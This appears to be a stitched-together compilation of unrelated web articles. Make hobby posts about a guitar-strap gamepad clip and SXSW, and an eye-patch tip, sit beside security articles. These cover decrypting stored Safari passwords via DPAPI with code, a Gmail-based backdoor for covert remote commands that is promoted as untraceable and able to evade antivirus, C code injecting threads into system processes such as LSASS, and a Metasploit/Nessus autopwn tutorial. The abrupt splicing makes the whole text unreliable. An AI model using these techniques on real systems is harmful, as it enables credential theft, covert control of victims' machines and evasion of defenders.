If you’re playing Rocksmith (and I think you should be), and you’re playing standing up (ditto), you have probably run into the “where do I put the controller” problem. The gamepad is required to navigate the menu system between songs, and if you play in a standing position you have to keep a stool or a table nearby to keep it within easy reach.
This simple mod mounts a spring steel clip to the underside of a standard Xbox 360 controller so you can attach it to your guitar strap. In this position, it is easily accessed with your strumming hand.
The steel clip I’m using is a common replacement visor clip for several models of garage door remote. A belt clip fitting, such as Tandy Leather’s 1238-00, should work just as well. The clip is secured to the Xbox battery holder in two ways: first with a short bolt that engages a small hex nut and lockwasher inside the battery holder, and second with a strip of double-sided foam tape that keeps it from rotating about the single bolt.
This mod does not affect normal controller operation in any way. The battery holder can still be removed and the batteries changed normally. In this position, the steel clip is inconspicuous and does not interfere with a normal gameplay grip, nor, significantly, with the controller’s resting attitude on a flat surface.
Make: Projects — Guitar Strap Gamepad
Sean Michael Ragan – Austin, TX
It’s cold and rainy in Austin for SXSW, lines are long inside at registration, and the outdoor tequila party stages are wet and empty.
The steadfast Make: Live crew has taken the quiet start to test out our livestreaming camera rig (six modem cards! no tin hat!) and to line up interviews for our alt.SXSW coverage.
We’ve already got time planned with Stupid Fun Club, the X Prize Foundation, MakerBot, frogdesign, Second Life founder Philip Rosedale, and more.
If you’re at SXSW and you or your company have hardware, hacks, solutions, or ideas that you want to share with the MAKE audience, hash tag #makesxsw on Twitter or email sabrina@makerfaire.com to set up an interview.
For the fast track, follow #makesxsw on Twitter for updates, observations, and pix. And stay tuned for the weather to clear and the SXSW action to heat up.
I asked Dan Pashman, Editorial Director of AmericansElect.org, to write about how he and his colleagues modified a Rock ‘Em Sock ‘Em Robot set with new heads. Here’s what he wrote:
We wanted to make our own version of Rock ‘Em Sock ‘Em Robots for the Americans Elect lounge at SXSW, so we decided to replace the heads with donkey and elephant heads, to represent the two political parties. This also goes with the giant plush donkey and elephant that people may see in action around SXSW, who are with us. Like the two parties, they just can’t get along.
For this maker’s project, we teamed up with our friends at LBi. Here’s how we did it…
We made rubber molds for the donkey head, donkey ears, elephant head, and elephant ears. We sculpted the heads in clay, then pressed them halfway into a liquid rubber compound. We also made spherical indentations (“keys”) in the mold near the head on one side and a bump on the other, so we’d have something to line up the two halves of the mold. It’s very important that you spray a lot of mold release before you make the second part of the mold.
When you line the two halves of the rubber mold up and press them together, create a hole in the top to pour the liquid plastic in.
We used a two-part plastic mix and added dye. The original plastic mix is yellow, so you have to add a lot of white to get it to blue, but the white pigment makes the plastic softer, so there was a lot of trial and error involved. We went with a yellow plastic mix over clear because yellow is faster drying and we wanted to be able to go through trial and error quickly.
After you’ve poured the liquid plastic into the sandwiched-together mold, put it in a clamp and leave it to dry. When you remove it, drill holes up through the neck to attach to Rock ‘Em Sock ‘Em Robot base, and buff the seams. For the elephant we drilled holes into the sides of the head and stuck the ears in. For the donkey we made the mold so the ears wedge in to the top of the head. In both cases we used plastic glue to attach ears to the heads.
With the donkey head, it was very difficult to get the blue color. We found if you add a lot of pigment it doesn’t bind correctly, and you get different levels of hardness in the plastic, and it’s tough to do it consistently. We ended up making a bunch of them and went with the best looking ones.
The shorts were sewn together on the robots.
Come to the Americans Elect lounge at SXSW, not only for the Flash Mob Happy Hours, but also to play Rock ‘Em Sock ‘Em Robots: Donkey v. Elephant yourself! And tweet a photo or video of our living, breathing donkey and elephant at #donkeyVelephant to win your own version of this limited edition game!
See all the process photos on Flickr.
Editor’s Note: MAKE will be covering SXSW and is going to try to get to the Rock ‘Em Sock ‘Em Robots: Donkey v. Elephant event to cover it here on the site. Stay tuned…
Safari is one of the top 5 browsers, known for the innovative look and feel reflected in every Apple product. It offers one of the best ways to browse online, greater support for HTML5, and other new features that make the web an even better experience.
Like other browsers, Safari comes with a built-in ‘password manager’ feature for securely storing and managing the user's web login passwords.
This article exposes, in a first public disclosure, the password secrets of Safari: the stored password location, the encryption algorithm, and code for decrypting the stored passwords.
Safari Password Storage Location
Safari features a good password manager with a better security model and encryption algorithms to keep passwords as secure as possible. Unlike other browsers such as Firefox and Chrome, Safari does not let you see the stored passwords.
You can enable or disable the Safari password manager by toggling the option under "Settings -> AutoFill -> Usernames & Passwords" (as shown below). Once enabled, Safari prompts the user to save the password on every website login. Upon confirmation, the website URL along with the username and password is saved to the secret password file.
Safari stores all such web login passwords in a secret file named 'keychain.plist' at the following location (depending on platform):
[Windows XP] C:\Documents and Settings\\Application Data\Apple Computer\Preferences
[Windows Vista & Windows 7] C:\Users\\AppData\Roaming\Apple Computer\Preferences
Safari stores the contents of 'keychain.plist' in the 'Binary Property List' file format, a variation of the Property List [Reference 1] format used by Apple for storing binary data.
Here is how a typical 'keychain.plist' file looks:
Decoding the Safari 'Keychain' Secrets!
Looking at the above 'keychain file' content, there is hardly anything you can make out. The only hint you get is the 'bplist' keyword at the beginning of the file.
After long hours of searching on the 'bplist' keyword, I finally figured out how to decode its content into a plain XML file. Apple provides a tool called 'plutil.exe' for working with these 'Property List' files. You can find this console tool at the following location:
[Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support
[Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support
Here is the command to convert the cryptic 'keychain.plist' file into an easily readable 'keychain.xml' file:
This is how it looks after decoding to an XML file:
Internals of Safari Encryption Algorithm
The generated XML file (as shown above) contains the encrypted password data along with the website URL and user login information. This stored password data is encoded using the BASE64 algorithm.
Note that the original password data stored in the 'keychain.plist' file is not BASE64 encoded. When we convert it to XML using the plutil tool, the encrypted password data is additionally encoded in BASE64 format.
Once you decode the BASE64 you will see the original encrypted password data. Safari uses the standard 'Windows Data Protection' mechanism (DPAPI) [Reference 2] to encrypt the password data with a user isolation layer. Windows DPAPI provides functions like CryptProtectData/CryptUnprotectData for easy encryption/decryption of user-oriented sensitive data such as passwords.
Safari uses CryptProtectData [Reference 3] along with static entropy (salt) to securely encrypt all website login passwords. Finally it is stored in the 'keychain.plist' file along with the other user login information.
Decoding & Decryption of Safari Password
As mentioned in the previous section, successful Safari password recovery requires the following 2 steps:
1. Base64 decoding of the password data from the XML file
2. Windows DPAPI decryption of the encrypted data
First you have to use a standard Base64 decoder algorithm [Reference 5] to get the original password data from the encoded password bytes in the XML file.
After that we have to decrypt this encrypted password data. In order to do so we need to figure out the salt data used in CryptUnprotectData. Here is the salt data that I found during my reverse engineering work.
The entire salt generation algorithm and the decryption functions are within the Apple shared library 'CFNetwork.dll', which is present at the following location:
[Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support
[Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support
Here is the disassembly of CFNetwork.dll from the IDA Pro disassembler [Reference 6] showing the location of the salt generation & decryption function.
Initially the salt generation algorithm appeared to be dynamic, but after a few reversing sessions on different systems my doubts were cleared: it was just static data. The salt data is 144 bytes in size and ends with the standard signature pattern 'com.apple.Safari', as shown in the above screenshot. Once you get hold of the salt data, the encrypted password can easily be decrypted using the CryptUnprotectData function [Reference 4], as shown below:
The above program initializes the salt data and then passes it to CryptUnprotectData along with the decoded password data to finally get the decrypted data. The first 4 bytes of this decrypted data contain the length of the password, followed by the password in clear text!
That is all it takes to successfully decrypt a password from the Safari store!
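The decoding pipeline described above (bplist to XML, Base64, DPAPI, then a length-prefixed plaintext) is easy to follow in code. The script below is an added example, not the article's program or Apple's code: it builds a constructed binary plist with the same shape (URL, user name, opaque encrypted blob; the key names are assumed, not Safari's real ones), converts it to XML the way `plutil -convert xml1` does, Base64-decodes the `<data>` element, and parses the length-prefixed layout the article describes, assuming a little-endian length field. The DPAPI step calls CryptUnprotectData through ctypes and only works on Windows; the 144-byte Safari entropy is not reproduced here and must be supplied by the caller.

```python
"""Walk the Safari-for-Windows keychain decoding pipeline on constructed data.

Added example, not the article's code. Key names inside the plist are assumed;
the DPAPI entropy (the article's 144-byte 'salt') is NOT included.
"""
import base64
import plistlib
import re
import struct
import sys

# Constructed stand-in for the CryptProtectData output stored by Safari.
SAMPLE_BLOB = b"\x00DPAPI-BLOB-PLACEHOLDER"


def build_sample_keychain():
    """Constructed binary plist mimicking the shape of a keychain.plist entry."""
    doc = {"entries": [{"url": "https://example.test/login",   # assumed key names
                        "user": "alice",
                        "password": SAMPLE_BLOB}]}
    return plistlib.dumps(doc, fmt=plistlib.FMT_BINARY)


def bplist_to_xml(raw):
    """Equivalent of `plutil -convert xml1`: parse the bplist, re-emit as XML."""
    if not raw.startswith(b"bplist"):
        raise ValueError("not a binary property list (missing 'bplist' magic)")
    return plistlib.dumps(plistlib.loads(raw), fmt=plistlib.FMT_XML)


def extract_password_blobs(xml_bytes):
    """Step 1 of the article: Base64-decode every <data> element in the XML."""
    blobs = []
    for m in re.finditer(rb"<data>\s*(.*?)\s*</data>", xml_bytes, re.S):
        # plutil/plistlib wrap the Base64 across indented lines; strip whitespace.
        blobs.append(base64.b64decode(b"".join(m.group(1).split())))
    return blobs


def parse_plaintext(decrypted):
    """Layout the article describes after DPAPI: 4-byte length, then the password.

    Byte order is assumed little-endian (the article does not state it).
    """
    if len(decrypted) < 4:
        raise ValueError("decrypted buffer too short for a length prefix")
    (n,) = struct.unpack("<I", decrypted[:4])
    if n > len(decrypted) - 4:
        raise ValueError("length prefix exceeds buffer size")
    return decrypted[4:4 + n]


def dpapi_unprotect(blob, entropy):
    """Step 2 of the article: CryptUnprotectData with caller-supplied entropy.

    Windows only; on other platforms this raises instead of silently failing.
    """
    if sys.platform != "win32":
        raise OSError("DPAPI (crypt32!CryptUnprotectData) is only available on Windows")
    import ctypes
    from ctypes import wintypes

    class DATA_BLOB(ctypes.Structure):
        _fields_ = [("cbData", wintypes.DWORD),
                    ("pbData", ctypes.POINTER(ctypes.c_char))]

    def make_blob(b):
        buf = ctypes.create_string_buffer(b, len(b))
        return DATA_BLOB(len(b), ctypes.cast(buf, ctypes.POINTER(ctypes.c_char))), buf

    inp, keep1 = make_blob(blob)
    ent, keep2 = make_blob(entropy)
    out = DATA_BLOB()
    ok = ctypes.windll.crypt32.CryptUnprotectData(
        ctypes.byref(inp), None, ctypes.byref(ent), None, None, 0, ctypes.byref(out))
    if not ok:
        raise ctypes.WinError()
    try:
        return ctypes.string_at(out.pbData, out.cbData)
    finally:
        ctypes.windll.kernel32.LocalFree(out.pbData)


def demo_pipeline():
    """Run the platform-independent part of the pipeline on the constructed file."""
    raw = build_sample_keychain()
    xml = bplist_to_xml(raw)
    blobs = extract_password_blobs(xml)
    return raw[:6], len(blobs), blobs[0]


if __name__ == "__main__":
    magic, count, first = demo_pipeline()
    print("magic:", magic, "blobs:", count, "first blob:", first)
    print("layout parse:", parse_plaintext(b"\x06\x00\x00\x00secret\x00\x00"))
```

On Windows, `dpapi_unprotect(blob, entropy)` followed by `parse_plaintext(...)` completes the chain; elsewhere the example stops after Base64 decoding, which is exactly the boundary where user-bound DPAPI protection takes over.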
Recovering Safari Passwords using SafariPasswordDecryptor
SafariPasswordDecryptor [Reference 7] is FREE software to automatically recover website login passwords stored by the Safari web browser. It instantly decodes and decrypts all the stored website login passwords from the Safari keychain file.
It presents both a GUI and a command line interface; the latter is more helpful for penetration testers in their work. Apart from normal users who can use it to recover their lost passwords, it can come in handy for forensic folks in their investigations.
SafariPasswordDecryptor works on most Windows platforms, from Windows XP to the latest operating system, Windows 7.
References
1. Apple's 'Property List' File format
2. Windows Data Protection Technology – DPAPI
3. CryptProtectData Function
4. CryptUnprotectData Function
5. Base64 Decoder Algorithm – C/C++ Program
6. IDA Pro – Most Popular Disassembler on the Planet
7. SafariPasswordDecryptor - Apple Safari Password Recovery Software
This paper demonstrates a unique kind of communication technique between the attacker's machine and the victim's machine during the exploitation of a victim system. Usually, once an attacker exploits a remote system and gets a remote command prompt (remote shell), the attacker can only execute commands while the session to the remote machine is open (established). When exploiting a system in the normal way, both the attacker and the victim system have to be online if the attacker wants to execute commands on the remote machine (victim machine). This paper demonstrates how an attacker can attack a remote victim without being online (the attacker may or may not be online AND the victim may or may not be online).
History
During the exploitation of a vulnerable remote system (victim system), after the vulnerability has been triggered, the attacker sends a payload and gets a remote command prompt on his/her (the attacker's) machine. With this kind of normal payload, the limitation for the attacker is that once the session has expired or the shell is terminated, the attacker can't execute commands on the remote machine (victim computer). This white paper demonstrates a new type of payload with which an attacker can execute commands on the remote machine (victim system) without directly connecting to the victim machine, while also fooling antivirus, firewalls etc.
My Method
In the general scenario, if an attacker gets a remote command prompt and executes commands in the current session, there is direct communication (a connection) between attacker and victim machine. With this paper's mechanism we can avoid direct communication (a connection) between attacker and victim. For this we use an intermediate server (zombie) that should be up and running all the time (24x7). In our case we use an email service like Gmail, Yahoo, MSN etc. as this zombie. The whole system works as explained below.
The attacker infects the remote system with an executable, which can be delivered by one of the methods below:
1. By autorun.inf
2. During Metasploit exploitation
3. Physical access to the victim system
Once the executable is up and running on the remote machine (victim machine), whenever the victim connects to the internet it first checks the instructions placed in the Gmail inbox by the attacker. Say the attacker wants to execute the command ‘ipconfig’ on the remote machine (victim machine); then the attacker has to send an email with the subject ‘ipconfig’ to his own email address. Because the username and password are already embedded (encrypted) in the executable on the victim machine (remote machine), as soon as the victim comes online that executable automatically logs in to the Gmail account and reads all the command instructions loaded by the attacker.
It executes the commands of the attacker's choice and attaches the results to the attacker's Gmail account. The attacker simply has to download the attachment containing the command output from the victim machine. So there is an email service (Gmail) between attacker and victim machine. This shows that the attacker can execute commands on the victim system with no direct connection between attacker and victim machine, and if the attacker uses Tor (The Onion Router browser) or anonymizers to access the Gmail account, the attacker cannot be traced back (no reverse traces). The life cycle is as shown below:
Attacker <--> Proxy <--> Email Service <--> Victim
              (Tor, Anonymizers)   (Gmail, Yahoo, etc.)
(Proxy Case Scenario)
Hands-on-Approach
Stage I
Let’s say you have infected a remote system with this exe and you want account info, drive info and network info from the remote machine (victim machine). Then you have to send an email to your own account (note: the account is also read by the injected exe on the remote victim machine) with the subject containing account_info, driveinfo or networkinfo, as shown in the figure on the next page.
Stage II
Once the email with the appropriate subject has been sent to your account, it is time for the remote machine (victim machine) to come online and fetch the instruction given by the intruder (in this approach, the “Attacker”). As the victim system comes online, it executes the commands the attacker asked for, redirects the command output to a .data file and finally automatically attaches this file to your email account. Hence, by simply downloading this file you get all the cmd output in the attached .data file, as shown in the figure below.
In the above figure you can clearly see that all the required outputs are attached in your email account!
Advantages
1. The attacker is never going to be caught if he/she uses a browser like Tor, an anonymizer, a VPN or any proxy for accessing the attacking Gmail account.
2. No antivirus can detect the instruction data because all traffic comes over HTTPS, and antivirus software and network intrusion detection software simply see an outbound connection to Gmail.
3. Only a single Gmail account is required. The attacker and the victim machine are both connected to the same account, but the attacker knows and the victim doesn’t!
Disadvantages
The disadvantage is that if the victim has a habit of checking the current connections using commands like ‘netstat -n’, there is a possibility of detecting the Gmail connection when there is actually no browser activity. Still, it is difficult to detect because the process runs in hidden mode.
Conclusion
Using the above technique, the attacker sends commands as the subject of an email to his/her own email address; the commands are fetched and executed on the victim machine by the executable running there, and the results of those commands are sent back to the attacker’s email account as an attachment. So neither attacker nor victim needs to be online at the same time. Antivirus and firewalls are bypassed by this technique because they only notice that the victim system connects to Gmail (not to the attacker's machine for transferring data), and the data is transferred over Gmail's HTTPS encryption (no chance of signature-based detection because of HTTPS), so they find no threat to the victim machine and raise no security alarms!
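The Disadvantages section above names the one place this traffic shows up on the host: a connection to the mail service with no browser open. The script below, added here as an example and not part of the paper, shows how a defender turns that observation into a repeatable check. It parses constructed `netstat -ano` output (Windows layout, which includes the owning PID), joins it with a constructed PID-to-image map of the kind `tasklist` supplies, and reports established connections to HTTPS/mail ports owned by a process that is not a known browser or mail client. All addresses, PIDs and image names are made up for the demonstration.

```python
"""Triage check: established HTTPS/mail connections not owned by a browser.

Added example (not part of the original paper). Input is constructed text in
the layout of `netstat -ano` on Windows plus a constructed PID -> image map.
"""
import re
from collections import namedtuple

Conn = namedtuple("Conn", "proto local remote state pid")

# Constructed sample in `netstat -ano` layout (not a real capture).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    192.168.1.50:49712     203.0.113.10:443       ESTABLISHED     3120
  TCP    192.168.1.50:49730     203.0.113.10:443       ESTABLISHED     4420
  TCP    192.168.1.50:49731     198.51.100.7:993       ESTABLISHED     4420
  UDP    0.0.0.0:5353           *:*                                    1208
"""

# Constructed PID -> image name map (what `tasklist` would provide).
PROCESS_SAMPLE = {884: "svchost.exe", 3120: "firefox.exe",
                  4420: "svchost_update.exe", 1208: "mDNSResponder.exe"}

# Processes expected to hold HTTPS/mail sessions; tune per environment.
KNOWN_CLIENTS = {"firefox.exe", "chrome.exe", "iexplore.exe", "safari.exe",
                 "opera.exe", "outlook.exe", "thunderbird.exe"}
# HTTPS plus IMAP/POP3/SMTP submission ports used by web and desktop mail.
MAIL_PORTS = {443, 993, 995, 587, 465}

# Only TCP rows carry a state column; UDP rows and the header never match.
TCP_LINE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s*$")


def parse_netstat(text):
    """Turn `netstat -ano` style text into Conn records (TCP rows only)."""
    conns = []
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if m:
            local, remote, state, pid = m.groups()
            conns.append(Conn("TCP", local, remote, state, int(pid)))
    return conns


def remote_port(addr):
    """Port of 'host:port' or '[v6addr]:port'; rsplit keeps IPv6 colons intact."""
    return int(addr.rsplit(":", 1)[1])


def suspicious_connections(conns, processes, clients=KNOWN_CLIENTS, ports=MAIL_PORTS):
    """Established connections to mail/HTTPS ports whose owner is not a known client."""
    findings = []
    for c in conns:
        if c.state != "ESTABLISHED" or remote_port(c.remote) not in ports:
            continue
        image = processes.get(c.pid, "<unknown>")
        if image.lower() not in clients:
            findings.append((c.pid, image, c.remote))
    return findings


if __name__ == "__main__":
    for pid, image, remote in suspicious_connections(parse_netstat(NETSTAT_SAMPLE),
                                                     PROCESS_SAMPLE):
        print(f"PID {pid} ({image}) -> {remote}: mail/HTTPS session from a non-browser")
```

This is a triage filter rather than a detection rule: updaters and agents also speak HTTPS, so the allow-list must be tuned, and it is the PID's image path, signer and parent that then separate a hidden implant from a benign service. The paper's own observation that the process runs "hidden" does not help it here, because `netstat -ano` reports the owning PID regardless of whether the process has a window.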
Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows 7 | ClubHACK Magazine
Windows provides an API function called CreateRemoteThread (Ref 2) which allows any process to execute a thread in the context of a remote process. This method has mainly been used to inject a DLL into a remote process, a technique popularly known as 'DLL Injection'. Malware programs in particular exploited this mechanism to evade detection by injecting their DLL into legitimate processes such as Explorer.exe, Winlogon.exe etc.
Vista & Session Separation
The DLL injection technique using CreateRemoteThread worked flawlessly up to Vista without any limitations. However, from Vista onwards things changed with the introduction of 'Session Separation' (Ref 3). This was one of the many defenses introduced in Vista towards securing the system. 'Session Separation' ensures that core system processes, including services, always run in session 0 while all user processes run in different sessions. As a result, any process running in a user session failed to inject a DLL into a system process, as CreateRemoteThread does not work across session boundaries.
This is clearly evident from the MSDN documentation of the CreateRemoteThread function (Ref 2):
"Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process."
About NtCreateThreadEx Function
With the failure of CreateRemoteThread, there was a need for a universal solution for remote thread execution on the Vista and Windows 7 platforms. Enter NtCreateThreadEx (Ref 1), the undocumented function which provides a complete solution for executing a remote thread across session boundaries. It allows any process to inject a DLL into any other process, irrespective of the session in which it is running, as long as it has sufficient privileges.
Here is the prototype of the NtCreateThreadEx function [undocumented]:
typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx)(
    OUT PHANDLE hThread,
    IN ACCESS_MASK DesiredAccess,
    IN LPVOID ObjectAttributes,
    IN HANDLE ProcessHandle,
    IN LPTHREAD_START_ROUTINE lpStartAddress,
    IN LPVOID lpParameter,
    IN BOOL CreateSuspended,
    IN ULONG StackZeroBits,
    IN ULONG SizeOfStackCommit,
    IN ULONG SizeOfStackReserve,
    OUT LPVOID lpBytesBuffer);
This function is almost identical to CreateRemoteThread except for the last parameter, which takes an unknown buffer structure. Here is the definition of that buffer structure parameter...
This information is derived from reverse engineering work. Hence the meaning and importance of the internal fields of this buffer structure are not clear.
Executing Remote Thread into System Process using NtCreateThreadEx Function
The steps involved in executing the remote thread using NtCreateThreadEx are almost the same as for CreateRemoteThread. Hence the traditional steps such as allocating memory and copying the thread code into the remote process are not repeated here. For detailed steps you can refer to the article "Three Ways to Inject Your Code into Another Process" (Ref 4).
Before we begin, we need to load the NtCreateThreadEx function from ntdll.dll as shown below.
// NtCreateThreadEx is undocumented and has no import library, so resolve it at run time.
HMODULE modNtDll = GetModuleHandle("ntdll.dll");
if( !modNtDll )
{
    printf("\n failed to get module handle for ntdll.dll, Error=0x%.8x", GetLastError());
    return;
}

LPFUN_NtCreateThreadEx funNtCreateThreadEx =
    (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx");
if( !funNtCreateThreadEx )
{
    printf("\n failed to get function address from ntdll.dll, Error=0x%.8x", GetLastError());
    return;
}
Now set up the buffer structure which is passed as the last parameter to NtCreateThreadEx.
Finally, execute the remote thread 'pRemoteFunction' in the remote process using NtCreateThreadEx. Here one can use the 'LoadLibrary' function address instead of 'pRemoteFunction' to implement the 'DLL Injection' technique.
HANDLE hThread = NULL;
NTSTATUS status = funNtCreateThreadEx(
    &hThread,
    0x1FFFFF,                                   // THREAD_ALL_ACCESS on Vista and later
    NULL,
    hProcess,                                   // handle to the target process
    (LPTHREAD_START_ROUTINE) pRemoteFunction,   // start address inside the target process
    pRemoteParameter,                           // parameter passed to the remote thread
    FALSE,                                      // start instantly
    0, 0, 0,                                    // default stack settings
    &ntbuffer);
Now check the result of NtCreateThreadEx and then wait for the thread to run to completion. Note that native (Nt*) calls report failure through the returned NTSTATUS, not GetLastError.
if( hThread == NULL )
{
    printf("\n NtCreateThreadEx failed, status=0x%.8x", status);
    return;
}

// Wait for thread to complete....
WaitForSingleObject(hThread, INFINITE);
Finally, retrieve the return value of the remote thread function 'pRemoteFunction' to verify the result of the execution.
// Check the return code from the remote thread function
DWORD dwExitCode = 0;
if( GetExitCodeThread(hThread, &dwExitCode) )
{
    printf("\n Remote thread returned with status = %d", dwExitCode);
}
CloseHandle(hThread);
The steps illustrated above are almost the same as before, except that NtCreateThreadEx is used instead of CreateRemoteThread for creating the thread in the context of the remote process.
Limitations of NtCreateThreadEx Method
Though NtCreateThreadEx provides a universal solution on the Vista/Win 7 platform for remote thread execution, it is risky to use in production code as it is an undocumented function. As things may change with new versions and service packs, enough testing is necessary before putting it into production, especially when injecting code into system-critical processes such as LSASS.EXE or CSRSS.EXE.
Another limitation is that it cannot be used on platforms earlier than Vista, such as Windows XP, because NtCreateThreadEx is only available from Vista onwards. However, developers can easily tune their code to dynamically use CreateRemoteThread on XP and NtCreateThreadEx on Vista/Windows 7.
Alternative Techniques
Another way to inject a DLL into a system process is to write a service process (which will run in session 0) and then issue a command from the user process to that service to inject the DLL into any system process using CreateRemoteThread.
This technique works for any system process running in session 0, but it fails to execute a thread in any process running in a session other than 0.
Though it is a clumsy way of doing the work, it still holds as a good solution for injecting a thread into system processes only.
Conclusion
This article provides a practical implementation of using NtCreateThreadEx to execute a remote thread in any process on the Vista/Windows 7 platform. Though it is an undocumented function, it provides a universal solution for executing code in any process across the session boundaries imposed by Vista/Windows 7.
References
1. NtCreateThreadEx Function
2. MSDN Documentation of CreateRemoteThread Function
3. Impact of Session 0 Isolation on Services
4. Three ways to inject code into remote process
About The Author
Nagareshwar is a security professional with an unbeaten passion for computer security, mainly involved in reverse engineering, security research and developing security tools. He holds an engineering degree in Computer Science from the National Institute of Technology Karnataka, Surathkal (KREC), India. He has around 6+ years of professional experience spanning Novell & Citrix, where he has worked on security and application virtualization technologies.
CHMag Collector's Edition Vol II
If you know you're going to be moving from a well-lit area to the dark, you can cover one of your eyes—like a pirate with an eye patch—for a few minutes beforehand to see better in the dark.
It's long been speculated that pirates and sailors would wear eye patches so they could see better below deck. They'd keep the eye patch on in the light, then when they went into the dark, they switched the eye patch over to the other eye. The one that had been under the eye patch for awhile would be well adjusted to the dark and they'd be able to see much better.
You can use this trick in your daily life, if you know you need to enter a dark area (say, a basement with no lights in it). Just cover up one of your eyes for a few minutes beforehand (or throw on an eye patch, if you're feeling rather piratey) and head down into the dark. If you open your eye and close the other one, you should be able to see better. This tip's been floating around the internet for awhile (not to mention it was mentioned on Mythbusters), but after a reminder from Redditor VerticalZero, we thought it was worth featuring. Hit the link to see more.
Using Metasploit with Nessus Bridge on Ubuntu | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home Using Metasploit with Nessus Bridge on Ubuntu Ever wondered how to use the autopwn feature in Metasploit on Ubuntu? Want to run nessus from within metasploit? What database should I use; sqlite3 or postgres? I will explain the benefits of both. The concept will allow you to do various tasks with your nessus server and nmap from within the msf command line. Nessus is a vulnerability scanner program, it is free for personal use using the home home. They also have a nessus for business which requires a fee. I will be discussing the nessus for home use and using it with the popular metasploit framework. Acquire the latest release of nessus homefeed Nessus-4.4.1-ubuntu1010_i386.deb and register for the activation code. Follow the instructions listed in the document ion for installing with Ubuntu and start to configure. Nessus daemon cant be started until nessus has been registered and the plugin (http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code) download has occurred. $ sudo /opt/nessus/bin/nessus-fetch –register 'registration code from nessus' Add user:- $ sudo /opt/nessus/sbin/nessus-adduser Make cert:- $ sudo /opt/nessus/sbin/nessus-mkcert
Start the nessus Daemon:- $ sudo /etc/init.d/nessusd start Open up web browser to https://localhost:8834, login and complete a policy for your scans. I would create a number of policies based on the different systems that you will be scanning. If your scanning a windows environment then having the plugin for Linux and BSD are pointless. Also make sure that you have safe checks enabled, select a port scanner to use, select credentials, select plugins (remember not to enable ones that will bounce the box), and select preferences. When finished you should have a number of different policies that will be numbered 1 – however many you have and you can give them names for example for scanning windows environment you can label them as windows. Now you can logout of nessus and close the web browser. Now open up a terminal and browse to where metasploit is installed and run an update. $ cd /opt/framework-3.6.0/msf3 $ sudo svn update Before we start the msfconsole lets get our database in proper order. Now I have used sqlite3 in the past and even did a tutorial on my website using sqlite3 http://pbnetworks.net/?cmd=bbs&id=35 which worked fine but sometimes it may not work and give error warning 'Note that sqlite is not supported due to numerous issues. It may work, but don't count on it.' Postgres is the recommended database for Metasploit. So let?s install the postgres database and libraries. $ sudo apt-get install postgresql-8.4 $ sudo apt-get install rubygems libpq-dev $ sudo gem install pg $ sudo apt-get install libreadline-dev $ sudo apt-get install libssl-dev $ sudo apt-get install libpq5 $ sudo apt-get install ruby-dev Now every time you start your system start the database before you start metasploit $ sudo /etc/init.d/postgresql-8.4 start
You will need to become the system postgres user:- $ sudo -s # su postgres Now you will need to create a database user: $ createuser -P Enter password for new role:Enter it again:Shall the new role be a superuser? (y/n) nShall the new role be allowed to create databases? (y/n) nshall the new role be allowed to create more new roles? (y/n) nNext we need to crate a database: $ createdb –owner= msf_database Now we can start up metasploit: :/opt/framework-3.6.0/msf3$ sudo ./msfconsole Enter in the following commands: msf> db_driver postgresql msf> db_connect :@127.0.0.1:5432/msf_database msf> db_hosts
Now before, when using sqlite3, creating and connecting to the database was easy. I would start up metasploit and issue the following commands: msf> db_driver sqlite3 msf> db_connect To verify if the database was connected I would issue the following command: msf> db_hosts If everything looked good I would have no errors and I could use the db_nmap command. But sometimes I would encounter errors and it would crash. Using postgres is more reliable than sqlite3 and it is also useful as I will describe later. Finally go ahead and enable the database on startup by issuing the following commands: msf> cat > ~/.msf3/msfconsole.rc db_driver postgresql db_connect :@127.0.0.1:5432/msf_database db_workspace -a MyProject ^D Now the next time you fire up metasploit your database will automatically be up and you will be connected to it. Just make sure that you have postgres running, I run postgres manually before I start metasploit (See Figure #1). Figure 1: Notice that postgresql loads when first starting the msfconsole Now that we have postgres as the database for metasploit lets start using nessus from within metasploit. Open up a second terminal and make sure nessus is running if not load the daemon. Now from the msfconsole load nessus (see figure #2). msf > load nessus Figure 2: Loading nessus from the msfconsole Now let see what kind of commands the Nessus Bridge for Metasploit 1.1 has given us, type nessus_help (see figure #3). msf > nessus_help Figure 3: Nessus Help The commands are divided up into different sections labeled Generic, Reports, Scan, Plugin, User, and Policy commands. Before we can run a scan we need to connect to the nessus server by using the nessus_connect command. msf > nessus_connect :@localhost:8834 ok This should connect and authenticate you. From here you can run the scans, review the results, and load the scan results into the database and use autopwn feature. 
Or you can view the results, find a vulnerability on a system you scanned, throw a single exploit and get a meterpreter shell. Depending on the environment you may want to review the results of your Nessus output and find the appropriate exploit to use instead of generating the noise of running autopwn. Now let's start our scan by issuing the nessus_scan_new command as follows:
nessus_scan_new (this was set in your nessus policy settings) (generic) (ip address)
msf > nessus_scan_new 1 winXP_home 192.168.1.124
To check up on the status of our scan use the nessus_scan_status feature (see Figure #4).
msf > nessus_scan_status
Figure 4: Nessus Scan Status
When the scan has completed you can view the results using the following commands:
msf > nessus_report_list
We can view a list of hosts from the report with the following command:
msf > nessus_report_hosts UID
To view further information issue the following command (see Figure #5):
msf > nessus_report_host_ports UID
Figure 5: nessus_report_host_ports 192.168.1.124 UID
To see a list of hosts issue the db_hosts command. If you want to remove hosts from the db_hosts list then issue the db_del_host command (see Figure #6).
Figure 6: db_del_host command
Next we need to load the results into our database with the following command:
msf> nessus_report_get UID
